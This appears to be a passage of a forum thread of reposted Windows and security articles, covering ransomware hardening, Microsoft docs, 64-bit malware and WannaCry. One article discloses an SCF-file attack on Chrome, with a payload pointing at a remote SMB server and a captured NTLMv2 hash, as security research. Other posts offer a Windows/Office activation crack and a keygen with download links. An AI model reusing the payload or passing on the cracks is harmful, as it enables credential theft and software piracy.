results. As you do, you’ll see the main window change to show you the app (or service) associated with that particular instance of Console Window Host. If the CPU or RAM usage indicates that this is the instance causing you trouble, then at least you’ve got it narrowed down to a particular app. Could This Process Be a Virus? The process itself is an official Windows component. While it’s possible that a virus has replaced the real Console Window Host with an executable of its own, it’s unlikely. If you’d like to be sure, you can check out the underlying file location of the process. In Task Manager, right-click any Service Host process and choose the “Option File Location” option. If the file is stored in your Windows\System32 folder, then you can be fairly certain you are not dealing with a virus. There is, in fact, a trojan out there named Conhost Miner that masquerades as the Console Window Host Process. In Task Manager, it appears just like the real process, but a little digging will reveal that it’s actually stored in the %userprofile%\AppData\Roaming\Microsoft folder rather than the Windows\System32 folder. The trojan is actually used to hijack your PC to mine Bitcoins, so the other behavior you’ll notice if it’s installed on your system is that the memory usage is higher than you might expect and the CPU usage maintains at very high levels (often above 80%). Of course, using a good virus scanner is the best way to prevent (and remove) malware like the Conhost Miner, and it’s something you should be doing anyway. Better safe than sorry! Article source
  13. 1: Patch management for clients and servers Keeping current with Windows Updates ensures that your clients and servers will be patched against any known threats. Vulnerabilities that exist in the form of zero-days will not be covered since that is not possible—and yet the WannaCry infection managed to infect more than 150 countries at such an alarming rate, despite a patch having been readily available almost two months prior to the attack. With patch management playing such a crucial role in on-going system protection, there is no end to the tools available to organizations —small, medium, or large—to help ensure that their systems are current. First-party tools available from Microsoft, such as Windows Server Update Services, which is included as a service of Windows Server or Systems Center Configuration Manager (SCCM), can manage patches, from deployment to remediation with included reporting on the status of all managed devices for first- and third-party applications. 2: Security software and hardware appliance updates As stated previously, each organization will have differing needs and resources available to best manage the network and its data. While some commonalities exist, such as firewalls and intrusion prevention systems (IPSes), these devices provide filtering of traffic at the ingress/egress of the network. Alongside firmware updates and signatures, these devices also offer manual configuration to better suit your network's protection requirements. Active monitoring of the health of these devices, along with updating configurations as necessary to match the network's needs, will result in enhancing the network's security posture and help enable the security appliance to stave off attacks. While these devices may not necessarily be Windows-based devices, I included them here because of the real-world benefit they provide in helping to mitigate unauthorized network intrusions and to fend off attacks. 3: Hardening device security Hardening clients and servers is imperative to limit the attack surface from internal or external attacks. The process of hardening a Windows client will differ from a Windows server, in that the aim for their use can vary drastically. By assessing what the devices will be used for, you can determine how the device should be locked down from a security standpoint. Keep in mind that any applications, services, and connected devices that are not needed or that are deprecated (such as the SMBv1 protocol that allowed the WannaCry exploit to proliferate) should be considered a potential attack vector that may be exploited and should be disabled immediately. Microsoft offers the Microsoft Baseline Security Analyzer (MBSA) for clients and servers alike to perform vulnerability assessments for devices and the services that run atop them. It also makes recommendations on how to harden them for the utmost security without compromising services. For newer OSes, such as Windows 10 and Windows Server 2012/2016, MBSA will still work, though it may be used in conjunction with the Windows Server Manager app to identify compliance with best practices, troubleshoot configuration errors, and identify operating baselines used to detect variations in performance, which may be an indicator of a compromised system. 4: Data backup management Let's face it, a computer is only as reliable as the data it works with. If said data has become compromised, corrupt, or otherwise lost its integrity—say through encryption by ransomware—it will cease to be useful or reliable. One of the best protections against ransomware in general is a good backup system. As a matter of fact, several backup systems are better still. Since data can be backed up to several different media at once, an incremental backup to a local drive that you can transport with you, alongside a constant backup to cloud storage with versioning support, and a third backup to a network server with encryption provides ample redundancy so that if your local drive becomes compromised, you still have three possible data sets to recover from. The Backup And Restore Utility native to Windows clients and servers provides a lightweight solution for backing up local data across multiple storage types. Meanwhile, OneDrive offers excellent cloud backup capability. Third-party software to centrally manage data backups across an organization or to/from the cloud is available from several providers as well. 5: Encryption for data at rest and in motion Encrypting data on the whole will not prevent your computer from ransomware infections, nor will it prevent a virus from encrypting the already encrypted data should the device become infected. Be that as it may, some apps use a form of containerization to sandbox data that is encrypted, rendering it completely unreadable by any process outside the container application's API. This is extremely useful for data at rest since it prevents outside access unless it's through the designated application. But it does nothing for data in motion or data that is being transferred over the network. In cases where transmission is required, the de facto standard is virtual private networking (VPN), since it creates an encrypted tunnel by which to send/receive data to/from, ensuring data is protected at all times. 6: Secured network infrastructure configurations Unfortunately, the network is often set up and configured during the installation period of new hardware and then it's left to operate unchecked until something fails. Networking equipment, including routers, switches, and wireless access points, require updated firmware and proper configuration, along with proactive monitoring to address trouble points before they become full-blown issues. As part of the configuration process, an optimized network will be set up for Virtual LANs (VLANs) or segment traffic and should be managed to ensure that data gets where it needs to go in the most efficient manner possible. Another security benefit of VLANs is the ability to logically quarantine malicious traffic or infected hosts so that they can't spread the infection to other devices or parts of the network. This enables administrators to deal with compromised hosts without risk of spreading the infection or to simply shut down the specific VLAN altogether to effectively cut off the device(s) from the internet until remediation has occurred. 7: Network, security, acceptable use, and data recovery policies Policies are often used by larger organizations to enforce compliance with rules and regulations by their employees. However, besides being a document that dictates the rules of the workplace, policies can also serve as guidelines for end users to follow before an attack takes place and as a survival guide during and after an attack occurs. While policies do not inherently stop malware at a technical level, if written properly they can address known issues or concerns with respect to data security and arm employees with useful information that could prevent an infection from spreading. Policies may also direct them to provide feedback to IT support to remedy a reported issue before it becomes a larger problem. Policies should always be considered "drafts" in a sense. Technology is dynamic and ever changing, so the policies that are in effect must change too. Also, be mindful of any restrictions or regulations that may apply to your field. Depending on the industry, writing policies can get tricky and should be addressed with management (and perhaps legal) teams for accuracy and compliance. 8: Change management documentation As with instituting policies, there is no direct correlation between documenting change management process (or recording all changes to clients/servers, including patch deployment, software upgrades and baseline analyses) and preventing ransomware outright. However, detailing changes made to systems configurations, along with the other measures previously listed, can have a profound effect on IT's ability to respond to threats proactively or reactively. Furthermore, it allows for adequate testing and measurement of results that any changes made to systems has on services provided and uptime availability. Lastly, it offers a record of the changes made (alongside their results), which administrators, contractors, and other support personnel can review to determine the cause of some issues or possibly address their recurrence in the future. For a comprehensive set of documentation to be useful, you need input from various support teams—including systems and network administrators, help desk staff, and management—to create a documentation process that is effective yet simple to follow and easy to manage. 9: End-user training Never underestimate the value of proper training for all staff, not just IT. Protecting against malware is not solely IT's job. It's everyone's responsibility since it affects everyone and can be essentially brought on by anyone at the organization. Considered a preventative measure, training that focuses on identifying possible malware attacks, such as phishing, can be an effective tool in preventing malware campaigns against your organization from compromising sensitive data. End-user training should center not just on identifying malware attack attempts, but should also target mitigation techniques that users can take to prevent or slow down infections should they suspect their computers have been compromised. Finally, no training is complete without informing users about the organization's expectations with respect to their responsibilities on reporting issues the instant they spot something out of the norm. 10: Risk management assessments The aim of a risk assessment (RA) and risk management (RM) process is to identify internal and external threats (also called hazards) and the equipment and services that are affected by them, as well as to analyze their potential impact. The management portion of RA involves evaluating this data to prioritize the list of risks and identify the best plan of action in mitigating them. RA and RM can help you pinpoint the trouble spots and implement an ongoing plan to prevent these issues from negatively affecting your organization. At the very least, RA/RM allows IT to focus its efforts on aligning the company's resources with the devices that pose the greatest threat if compromised, such as mission-critical systems. This process enables IT, management, and compliance/regulation entities to best determine the path forward in identifying equipment, mitigating hazards, determining the order in which to resolve threats, and evaluating the assessment itself so that procedures can be updated and corrective actions modified as risks change over time. Article
  14. When you have a support question that involves Microsoft Windows, where should you go first? If your normal starting point is to send a search query to Google or Bing, you're wasting time. You're also forcing yourself to sift through pages of irrelevant and possibly low-quality results. In recent years, Microsoft has been on a quiet mission to reorganize its online technical documentation. I've put together this cheat sheet you can use to get accurate information in a hurry. Docs Microsoft has been steadily moving its technical documentation to a new location. As of early 2017, Docs is now home to the technical documentation for Windows 10 and Windows Server 2016, joining Microsoft Azure, Office, and other products that moved there earlier. The new site (Figure A) is well organized, with great search capabilities, and it uses a responsive design that makes it readable on devices of all sizes--phones, tablets, and PCs. You can download documentation in PDF form for offline reading, too. Figure A All of the source files are located at GitHub, so if you see a typo or a technical error, you can sign in and fix it yourself by clicking the Edit button and opening the page directly from the repository, as shown in Figure B. You can also leave in-line comments. Figure B The Windows hub has separate sections for developers, hardware devs, and IT pros. Here are some Docs pages I recommend bookmarking:. Windows 10 Windows Server 2016 Windows UWP Apps TechNet For many years, TechNet has been the place to find technical information about Microsoft products written primarily for IT pros. It includes news, technical articles, and downloads for all Microsoft products. I recommend bookmarking these pages: TechNet Windows IT Center This home page spotlights new content that's likely to be of interest to IT pros, with a navigation bar along the top for finding documentation, downloads, and support information. Windows 10 Browse through tasks and categories to find tools, step-by-step guides, and other resources for planning, deploying, managing, and supporting Windows 10 in a business setting. Windows Server 2016 You'll find deployment and support resources here along with links to free evaluation versions and virtual labs. Security TechCenter Although this is a part of TechNet, it's so important that I've broken it out in its own category. Beginning in early 2017, Microsoft moved to a new system for publishing information about security vulnerabilities and updates. The main site is located here. I recommend bookmarking these three locations within that group:. Microsoft Security Response Center Security Tools & Downloads for IT Pros Security Support and Troubleshooting Help (including the Microsoft Knowledge Base) Microsoft's support site contains links to a dozen topic areas where you can find help. In general, the help under the Windows category is designed for consumers and nontechnical end users, not for IT pros. But this page is still worth bookmarking, because it's your gateway to the massive Microsoft Knowledge Base. Type a KB number or title into the search box and you'll go straight to a set of results that include the article corresponding with that number, as well as any related pages. (Note that this is a new syntax for these links, which used to be located in the /kb folder of that subdomain.) If you have the article number and you'd rather not search, just append the number (without the letters KB) to the end of the URL, like this: https://support.microsoft.com/help/4013214 Online forums Microsoft runs two sets of community forums for peer-to-peer support conversations. The Microsoft Community site is intended for consumers and nontechnical users. For technical questions of interest to IT pros, the TechNet forums should be your first stop. Topics available here include a much broader range of Microsoft products and technologies than those covered in the Community forums, with a special emphasis on deploying and using Windows in the enterprise. To narrow the set of forums so you can browse or search for answers to a specific question, click the View All link on the left side of the page, next to the Forums heading, and then select one or more forums to include, as shown in Figure C. Figure C You can skip that dialog box by using the search box below the Forums heading instead. If you consistently find yourself going back to the same forums, use the Add To My Forums link to save those forums in a custom list that's always available from the Quick Access shortcut. Article
  15. This may seem outdated but Microsoft published this document on 20 April 2017. Registry Settings 2017-4-20 1 min to read Contributors Windows Driver Developer Doc Team The registry is used by the joystick interface to store configuration, calibration, and user preference information. It is also used to store customized text for the calibration program. The Windows 95/98/Me joystick calibration program can be customized through the registry to provide instructions to the user during calibration that are specific to the joystick. The values fall into five groups: Original data supplied by the OEM and installed from an INF file (described above). User Values that specify how data is interpreted. Current Settings reflecting which devices are currently configured. Saved Settings that allow different configurations to be recalled. Driver Settings that are set up by the configuration manager as a device is set up. The user values, current settings, and saved settings are all stored in the registry under the path belonging to the "current" joystick driver. Each of the joystick devices for which a driver is installed has a key under the path REGSTR_PATH_JOYCONFIG that has the form Msjstick.drv<xxxx>, where the xxxx is a four-digit number used to keep the key name unique. The number relates to the number of multimedia (sound, video and game controller) drivers that have been installed. At boot time, Msjstick.drv is initialized to the configuration for each of the game controller drivers. Since it can only deal with one configuration at a time, each one replaces the last and the "current" driver is the last one to be initialized. This means that the user is likely to lose all the current settings when a new driver is installed, and a minidriver cannot be structured on the assumption that the path to these registry values will always be the same. Source
  16. Bitdefender 2017 Build 21.0.25.92 Overview: The Bitdefender proprietary technologies, based on innovative ideas and leading trends in the information security industry, continue to be internationally recognized as the best Internet security software. The independent organizations which reward BitDefender outstanding results through numerous prizes and certifications are: Av-Test.org, Virus Bulletin, ICSA Lab, Checkmark, PC World Top 100, just to name but a few. Homepage: https://www.bitdefender.com/ Changelog: https://forum.bitdefender.com/index.php?/topic/76152-latest-changelog/ A new Bitdefender Classic Line product update has been released with the following details: Affected software: Bitdefender Total Security 2017 Bitdefender Internet Security 2017 Bitdefender Antivirus Plus 2017 Platform: x86, x64 Version: 21.0.25.92 This version fixes the following issues: • Bitdefender Device Management would fail to connect with Windows KB is unavailable at this time. Downloads: Online Installers: Bitdefender Antivirus Plus 2017 21.0.25.92 Online: https://download.bitdefender.com/windows/installer/en-us/bitdefender_antivirus.exe XP | Vista: https://download.bitdefender.com/windows/installer/en-us/xp-vista/bitdefender_antivirus.exe Bitdefender Internet Security 2017 21.0.25.92 Online: https://download.bitdefender.com/windows/installer/en-us/bitdefender_isecurity.exe XP | Vista: https://download.bitdefender.com/windows/installer/en-us/xp-vista/bitdefender_isecurity.exe Bitdefender Total Security 2017 21.0.25.92 Online: https://download.bitdefender.com/windows/installer/en-us/bitdefender_tsecurity.exe XP | Vista: https://download.bitdefender.com/windows/installer/en-us/xp-vista/bitdefender_tsecurity.exe Offline Installers and Install Guide: Checksum - 30 May 2017 Offline Installer Update: bitdefender_ts_21_32b.exe (application/octet-stream) - 361535368 bytes MD5: 7953aad2edffcfcb19ed2eb4873627a7 SHA-1: 28c8aacf2aeb45345e8c9cdf34498dd8b0b5e1f0 SHA-256: 2da353fb0074db3fa0fd30c598e90817b3e43a85b4ff2fff9890636e97d1c2c4 SHA-384: c33279fd5c06f9a0e357e1e542a83f2964c84f409c419f59a8144c16fa73af539909b26928285ddf2f68c14702778245 SHA-512: ea2a46c91ebfdeade38d9da8cf53b33f3b1407ea83d18e0b5c20185820510b4c6a00ef4b15746599f9aef3dc34039c8f352ee1a32c052e5c3c1552a281c749ae bitdefender_ts_21_64b.exe (application/octet-stream) - 387255184 bytes MD5: f9cf114359ad76ad95216b43b722a016 SHA-1: 24c67202d6a92d488111aca6952b5b3d2d0a9822 SHA-256: 607999fb8be6a6d3322922548007258d19bdd2e046812ad47bde3186f66801ef SHA-384: a0597b34674815703d3ba192582e297fdbe830bed3faff85ddb1e295879390e5b1d6a2339986fae9a401d13affdd27ac SHA-512: d82fe9b728c14dd3685d52fff2d2e58acaf522f4e71a60cb36b95dda178348f60448b47509ebee5782d1f5cb12d6ff4237b404bc8f1fb024dcf976badd3717ea Bitdefender 2017 Offline Installation Guide:
  17. Whether it is just a matter of curiosity or a genuine need to know before adjusting the size of the file on your own computer, just how large can a Windows page file actually be? Today’s SuperUser Q&A post has the answer to a curious reader’s question. Today’s Question & Answer session comes to us courtesy of SuperUser—a subdivision of Stack Exchange, a community-driven grouping of Q&A web sites. The Question SuperUser reader Marina Dunst wants to know the maximum size that a Windows Page File can be: I know that the recommended size for a Windows page file (C:\Pagefile.sys) is around 1.5 to 2 times the amount of RAM. Out of curiosity, what is the maximum size that a Windows Page File can be? The Answer SuperUser contributors Steven, Ramhound, and Techie007 have the answer for us. First up, Steven: Followed by Ramhound: And our final answer from Techie007: Have something to add to the explanation? Sound off in the comments. Want to read more answers from other tech-savvy Stack Exchange users? Check out the full discussion thread here. Article source
  18. if you had windows 7 service pack 1 iso then slipstream the so called service pack 2 download first the ff: (on windows update catalog site) click on it and then select the correct windows architecture 32 or 64 KB3020369 (April 2015 Servicing Stack Update) kb3177467 (perquisite for convenience) kb3125574 (Convenience Rollup) kb2670838 (Platform Update) KB2841134 (IE 11 ) using NTLITE free intergrate the above hotfixes accordingly to get sp2 atleast you make it your own. instead of downloading this so called sp2 on the torrent or any other common user who built custom iso without knowing whats inside the iso
  19. !!!LOOK OUT!!! If you like MS Windows and MS Office please buy legal and original copy. This tools can be used for evaluation purposes ONLY. I recommend to buy a legal copy of the product. I will not encourage piracy and misuse of it. Some techniques used can make your antivirus alert. [Multi21*] Re-Loader v3.0 Beta 3 * Requirements .NET 4.0. - Install OEMLogos; - Activate Windows XP/Vista/7/8.x/10/Server 2008 (R2)/Server 2012 (R2)/Server 2016 RTM; - Activate Office 2010/2013/2016; * Before post a question, please read the FAQ. OEMLogo Pack 121 [09/03/2015]: Site: http://pastebin.com Sharecode[?]: /raw.php?i=rSP5spZg Re-Loader v3.0 Beta 3 [02/09/2016]: Site: http://www.mirrorcreator.com Sharecode[?]: /files/UEAVYF7T/ Office Pre-Activation Pack v1.6 Final [10/10/2015]: Site: http://pastebin.com Sharecode[?]: /raw.php?i=L6c2ye7B *The interface of this program is available at: Italian, English (tnx to azroach), Slovenian (tnx to CraftByte), Persian (tnx to Behdad Boujari), Portuguese (tnx to roonney), Vietnamese (tnx to vanhoivo), Deutsch (tnx to Ripdevil), Albanian (tnx to BL3D1), Arabic (tnx to alnaloty), Russian, (tnx to Phobos) French (tnx to jordan4x), Romanian (tnx to WebMan), Hebrew, Chinese (tnx to zihan), Serbian (tnx to agasoft), Korean (tnx to mireado), Indonesian (tnx to GlgApr), Polish (tnx to Mr. T), Spanish (tnx to -=4lfre1re=-), Dutch (tnx to Plexxor). on Twitter: @Ra1nReLoader: Be good it is for fun. I'm back on Twitter with the account @Ra1nReLoader This is my original account! other accounts are fake! be careful!
  20. !!!LOOK OUT!!! If you like MS Windows and MS Office please buy legal and original copy. This tools can be used for evaluation purposes ONLY. I recommend to buy a legal copy of the product. I will not encourage piracy and misuse of it. Some techniques used can make your antivirus alert. [Multi20*] Re-Loader v2.6 Final * Requirements .NET 4.0. - Install OEMLogos; - Activate Windows XP/Vista/7/8.x/10/Server 2008 (R2)/Server 2012 (R2)/Server 2016 RTM; - Activate Office 2010/2013/2016; * Before post a question, please read the FAQ. OEMLogo Pack 121 [09/03/2015]: Site: http://pastebin.com Sharecode[?]: /raw.php?i=rSP5spZg Re-Loader v2.6 Final [14/08/2016]: Site: http://www.mirrorcreator.com Sharecode[?]: /files/MWGZUCFF/ Office Pre-Activation Pack v1.6 Final [10/10/2015]: Site: http://pastebin.com Sharecode[?]: /raw.php?i=L6c2ye7B *The interface of this program is available at: Italian, English (tnx to azroach), Slovenian (tnx to CraftByte), Persian (tnx to Behdad Boujari), Portuguese (tnx to roonney), Vietnamese (tnx to vanhoivo), Deutsch (tnx to Ripdevil), Albanian (tnx to BL3D1), Arabic (tnx to alnaloty), Russian, (tnx to Phobos) French (tnx to jordan4x), Romanian (tnx to WebMan), Hebrew, Chinese (tnx to zihan), Serbian (tnx to agasoft), Korean (tnx to mireado), Indonesian (tnx to GlgApr), Polish (tnx to Mr. T), Spanish (tnx to -=4lfre1re=-). on Twitter: @Ra1nReLoader: Be good it is for fun. I'm back on Twitter with the account @Ra1nReLoader This is my original account! other accounts are fake! be careful!
  21. Upgrade and they will come The volume of 64-bit malware in the wild remains low even though computers running 64-bit operating systems became ubiquitous years ago. The vast majority (93 per cent) of new computers sold worldwide operate on 64-bit Windows but most nasties were written to infect 32-bit systems, according to a new study by security firm Deep Instinct. Deep Instinct reckons that 64-bit malware still makes up less than 1 per cent of the current threat landscape. But malware variants have recently begun to appear in 64-bit versions so this small figure is likely to grow. Various strains of ransomware and banking Trojan families (Zeus) have appeared in 64-bit versions over the last two years or so. Around 60 per cent of the 64-bit threat landscape is dominated by the worm-like Expiro spyware. Following that, the most common 64-bit families are Virut (20 per cent) and Nimda (10 per cent). "Zeus, the leading banking Trojan, which is responsible for the theft of hundreds of millions of dollars, was the first of its kind to contain a 64-bit version," Deep Instinct reports. "We expect other banking Trojans and ransomware to follows this trend, causing the numbers of 64-bit malware to increase in the coming years. "Sophisticated 64-bit malware has already appeared in several APT campaigns. Notably, the destructive disk-wiping Shamoon malware, which destroyed data on 35,000 computers at Saudi Aramco." The the cyber-security industry may face "serious challenges in detecting malicious 64-bit files," according to Deep instinct. Studies presented at Black Hat 2014 and elsewhere show that the industry underperforms on 64-bit files. White hats demonstrated that use of a 64-bit Meterpreter facilitates security package bypass. A more recent study, published in July 2016, that tested the detection rates of different Meterpreter stagers based on VirusTotal scan results also highlighted shortcomings. Source: Deep Instinct Code shift 32-bit applications can run on 64-bit systems through the WOW64 (Windows-on-Windows-64) functionality, which provides backwards compatibility for 32-bit applications installed on 64-bit Windows. This explains why the shift in the malware landscape has lagged behind customer adoption of 64-bit systems. While both 32-bit and 64-bit applications can be run on a 64-bit system, in most cases 32-bit code cannot access the memory of a 64-bit process. Driver-signing and the kernel "PatchGuard" protection make it extremely hard to infect 64-bit systems with rootkits. These factors, among others, are pushing miscreants into developing 64-bit malware. "While many 32-bit malware variants can work on 64-bit systems, attacks demanding access to 64-bit process memory, such as code injection or privilege escalation attacks, will be much easier to undertake using 64-bit malware," according to Deep Instinct. "Therefore, the threat landscape is expected to gradually shift to 64-bit malware, as 64-bit architectures and operating systems become the norm." Multiplatform Malicious 64-bit executables are not unique to Windows systems. Linux and macOS systems are also potentially at risk. As of the end of 2016, 64-bit variants make up just less than 10 per cent of the Linux threat landscape but their numbers are growing, according to Deep Instinct. Malware that supports 64-bit architecture makes up the majority of the macOS threat landscape – unsurprising as all macOS platforms since the 2011 vintage Lion run only on 64-bit architectures. Examples of recent 64-bit macOS malware include KeRanger, a fully functional ransomware that specifically targets Mac users, and Komplex, a cyber-espionage Trojan created by APT28. "As users continue to transition to 64-bit, malware authors will follow," Deep Instinct concludes, adding that many advanced persistent threats discovered in recent years (such as BlackEnergy and Shamoon) included 64-bit malware. Article source
  22. PHOTORECOVERY 2017 Professional 5.1.5.6 PHOTORECOVERY recovers “once in a lifetime” moments thought to be lost forever! PHOTORECOVERY® 2017 recovery software is designed to recover digital images, movies and sound files from all types of digital media. It is the #1 data recovery software for Memory Stick™s, SmartMedia, CompactFlash I & II, SD/XD cards, MMC, USB flash drives and most other forms of digital media. Simply attach the media to your computer (a card reader is recommended) and run PHOTORECOVERY® 2017. The pictures are automatically saved off to another location. Features: Homepage: http://www.lc-tech.com/pc/photorecovery/ Requirements: Program Updated: May 23, 2017 Download (Keygen Only) - shared by Om Cracked: Site: http://filescloud.co Sharecode[?]: /9aawjcy4tr6q (Note: To get the activation code in the keygen, copy and paste the URL of the activation page in the keygen.) Installer + Fix: Win: Site: https://www.mirrorcreator.com Sharecode: /files/0RNIP4A4/LC.Technology.PHOTORECOVERY.Professional.5.1.5.6.rar_links Pwd: soft98.ir Mac: Site: https://www.mirrorcreator.com Sharecode: /files/AXULV7EV/LC.Technology.PHOTORECOVERY.Professional.5.1.5.0.Mac.zip_links Pwd: soft98.ir
  23. 8GadgetPack makes it possible to use gadgets on Windows 10 / 8.1 / 8. Version History: Version 23.0 released. Made some usability tests and quite some issues came up! Added newsletter option so you can get notified about updates via mail. Fixed rare crash in Clipboarder when opening a link. Added workaround for a bug in MS Word when copying a formula while Clipboarder is running (Word crashes when the user copies a formula and then the textformat of the clipboard is requested. Clipboarder detects this now and skips the text formats). Added also another workaround for a minor bug in Word: When a certain clipboard format is requested Word adds a favorit inside the document. That format is now skipped as well. Fixed a bug with the "Enable unformatted paste" option in Clipboarder when used with the right shift-button. Clipboarder now handles images with transparency copied in browsers correctly. Added Date Time, Digitalclock, Turn off PC, CPU and Network Utilization Gadgets. Removed Google Mail gadget (it no longer works). You can place gadgets on the sidebar whereever you want now without snapping while holding Shift. Added workaround for a bug that caused several gadgets to fail sometimes during startup. Fixed a bug that caused gadgets to go behind the sidebar sometimes. Fixed many minor issues. Homepage: http://8gadgetpack.net/ Download: http://8gadgetpack.net/download230/8GadgetPackSetup.msi
  24. The NSA used the vulnerability in attacks for 5 years The WannaCry ransomware outburst is living proof that systems across the world need to be running the latest patches and supported operating system versions, but while Microsoft rolled out updates to block the exploit before the mass infection started, new information reveals some behind-the-scenes details. A report from the Washington Post reveals that the NSA itself reported the vulnerability to Microsoft after discovering that a group of hackers managed to steal it from its systems. The National Security Agency was hit by a cyberattack launched by Shadow Brokers last year, and the hackers managed to steal several exploits that the agency itself was using to break into Windows computers. Since most of these exploits were based on unpatched vulnerabilities in Windows, leaking them online could have led to large-scale attacks, so in order to prevent this, the NSA itself reported the bugs to Microsoft to have them patched. The agency, however, did this for its own good, as it was afraid that hackers might use the exploits against computers used by officials in the United States, including those belonging to the Department of Defense. NSA used the flaw for 5 years After being tipped off about the vulnerability, Microsoft developed a patch in mid-February and published it for supported Windows systems in March, with unsupported Windows versions getting the fix only if they were covered by a custom support license. After the massive ransomware infection started this month, Microsoft decided to release this patch for all users, including for those running Windows XP. More worrying is that the NSA actually used the same vulnerability to hack into Windows systems for no less than 5 years before reporting it to Microsoft. And there’s a good chance that the flaw would have remained completely secret if the hackers didn’t break into NSA systems. This is one of the reasons Microsoft criticized the NSA and government departments for not reporting security flaws to vendors, emphasizing that systems worldwide are made vulnerable just because they’re keeping major vulnerabilities for their own hacking programs. “Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage. An equivalent scenario with conventional weapons would be the U.S. military having some of its Tomahawk missiles stolen. And this most recent attack represents a completely unintended but disconcerting link between the two most serious forms of cybersecurity threats in the world today – nation-state action and organized criminal action,” Microsoft said. Source
  25. Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare research involving attacks over the Internet was presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference in 2015. However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This article describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it. The problem With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one. From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage. However, what if the downloaded file requires no user interaction to perform malicious actions? Are there file types that can do that? Windows Explorer Shell Command File or SCF (.scf) is a lesser known file type going back as far as Windows 98. Most Windows users came across it in Windows 98/ME/NT/2000/XP where it was primarily used as a Show Desktop shortcut. It is essentially a text file with sections that determine a command to be run (limited to running Explorer and toggling Desktop) and an icon file location. Taken as an example, this is how Show Desktop SCF file contents looked like: [Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what is the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet but does not give the same treatment to SCF files. SCF file that can be used to trick Windows into an authentication attempt to a remote SMB server contains only two lines, as shown in the following example: [Shell] IconFile=\\170.170.170.170\icon Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the “icon “. The remote SMB server set up by the attacker is ready to capture the victim’s username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password. The captured information may look like the following: [*] SMB Captured - 2017-05-15 13:10:44 +0200 NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182 USER:Bosko DOMAIN:Master OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e0000000002000000000000 0000000000 Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06f cdd201ccf26d91cd9e326e00000000020000000000000000000000 The above example shows a disclosure of victim’s username, domain and NTLMv2 password hash. It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files. Impact Password disclosure For users in Active Directory domains (corporate, government and other networks), password disclosure can have various impacts ranging from escalating internal network breaches to accessing externally available NTLM-enabled services and breaches based on password reuse. For Windows 8/10 users that are using a Microsoft Account (MSA) instead of a local account, the password disclosure impacts all the Microsoft services that are integrated with the MSA SSO such as OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and others. The common problem of password reuse can lead to more account breaches unrelated to MSA. Regarding password cracking feasibility, this improved greatly in the past few years with GPU-based cracking. NetNTLMv2 hashcat benchmark for a single Nvidia GTX 1080 card is around 1600 MH/s. That’s 1.6 billion hashes per second. For an 8-character password, GPU rigs of 4 such cards can go through an entire keyspace of upper/lower alphanumeric + most commonly used special characters (!@#$%&) in less than a day. With hundreds of millions leaked passwords resulted from several breaches in the past years (LinkedIn, Myspace), wordlist rule-based cracking can produce surprising results against complex passwords with more entropy. The situation is even worse for Windows XP systems and networks where backwards compatibility with NTLMv1 has been explicitly enabled. In those cases, a downgrade attack can be performed forcing the client to authenticate with a weaker hash/protocol (such as NTLMv1 or even LM) instead of NTLMv2. This enables the attacker to capture a hash which can be cracked many times faster than NTLMv2 – in the case of LM often within seconds using precomputed tables for reversing cryptographic hash functions (“Rainbow tables”). SMB relay attacks Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password. This was successfully demonstrated by Jonathan Brossard at the Black Hat security conference. Under certain conditions (external exposure) an attacker may even be able to relay credentials to a domain controller on the victim’s network and essentially get an internal access to the network. Antivirus Handling of SCF Naturally, when a browser fails to warn on or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead. We tested several leading antivirus solutions by different vendors to determine if any solution will flag the downloaded file as dangerous. All tested solutions failed to flag it as anything suspicious, which we hope will change soon. SCF file analysis would be easy to implement as it only requires inspection of IconFile parameter considering there are no legitimate uses of SCF with remote icon locations. Introducing new attack vectors Although using social engineering to entice the victim to visit the attacker’s website as well as open redirection and cross site scripting vulnerabilities on trusted websites are the most common attack vectors to deliver malicious files, for this attack I would like to add an often disregarded and lesser known vulnerability that could serve the same purpose, hoping it would bring attention to its impact. Reflected file download First described by Oren Hafif, the Reflected File Download vulnerability occurs when a specially crafted user input is reflected in the website response and downloaded by the user’s browser when the certain conditions are met. It was initially used as an attack vector to trick the user into running malicious code (usually from a Windows batch file), based on the user’s trust in the vulnerable domain. Since SCF format is rather simple and our attack requires only two lines that can be preceded and followed by (almost) anything, it creates perfect conditions to be used with RFD. RFD is usually aimed at RESTful API endpoints as they often use permissive URL mapping, which allows for setting the extension of the file in the URL path. Chrome will not download most of typical API response content types directly so these would have to be forced through a download attribute in a href=… link tags. However, there are exceptions. Chrome uses MIME-sniffing with text/plain content type and if the response contains a non-printable character it will be downloaded as a file directly and automatically unless the “nosniff” directive is set. This can be demonstrated on World Bank API, using the following URL: 